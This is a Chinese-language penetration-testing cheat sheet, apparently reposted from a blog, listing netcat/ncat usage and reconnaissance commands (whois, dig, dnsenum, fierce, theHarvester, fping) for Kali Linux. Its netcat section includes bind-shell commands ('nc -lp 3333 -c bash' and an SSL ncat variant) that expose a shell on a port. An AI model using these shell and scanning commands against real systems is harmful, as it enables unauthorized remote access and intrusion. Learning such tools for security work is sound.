kali渗透测试

【信息收集阶段】

【netcat-瑞士军刀】

nc  -nv  1.1.1.1  21  【连接ip加port】

nc   -l -p  4444  【开放port-4444,并监听port-4444】

nc  -nv  1.1.1.1  4444  【连接ip+port,实现简单聊天功能】

nc  -lp  4444  >text.txt  -q 1  【传输内容重定向到text.txt】

nc  -nv  1.1.1.1  4444  >text2.txt  【连接ip+port,并传输文件内容】

nc  -nvz  1.1.1.1 1-1024  【扫描端口】

nc  -lp  3333   -c  bash  【开放port,并启动bash】

nc   -nv  1.1.1.1  3333  【连接ip+port,实现ifconfig,pwd等等的命令操作,相当于ssh的功能】

ncat  -c  bash  --  allow  1.1.1.1  -nvl  3333  --ssl  【开放bash+port,允许1.1.1.1ip连接,ssl加密传输】

ncat  -nv  1.1.1.1  3333  --ssl  【连接1.1.1.1+3333,+ssl,加密传输内容】

【域名注册信息】

whois  xxx.com

【DNS记录分析】

SOA  授权管理该域的服务器

NS    名称解析服务器

A       IPV4地址

MX    邮件服务器

PTR  逆向解析服务器

AAAA  IPV6地址

CNAME  别名记录

【host-收集域名真实ip】

host   www.xxx.com

host -a xxx.com

【dig收集域名信息】

dig  xxx.com    any(所有)

【dnsenum-收集域名信息】

dnsenum -enum  xxx.com

【fierce-域名枚举所有信息】

fierce -dns xxx.com   -threads 3    【多线程收集-比较慢,但是信息量很大】

【dmitry】

dmitry -iwnse  xxx.com

dmitry  -p  1.1.1.1 -f -b  【可实现简单端口扫描】

【tcptraceroute-路由信息】

tcptraceroute   www.xxx.com

tctrace  -i eth0  -d   www.xxx.com

【theharvester-搜索引擎】

theHarvester  -d   www.xxx.com  -l   100 -b  goole

【目标识别】

【ping】

ping -c 1.1.1.1

arping  1.1.1.1 -c 1

arping -d -i eth0 1.1.1.1 -c 2

fping  1.1.1.1

fping -g 1.1.1.1/16

fping -r 1 -g 1.1.1.1

fping www.xxx.com 

====【未完待续】=====

原文地址:https://www.cnblogs.com/duanlinxiao/p/12619732.html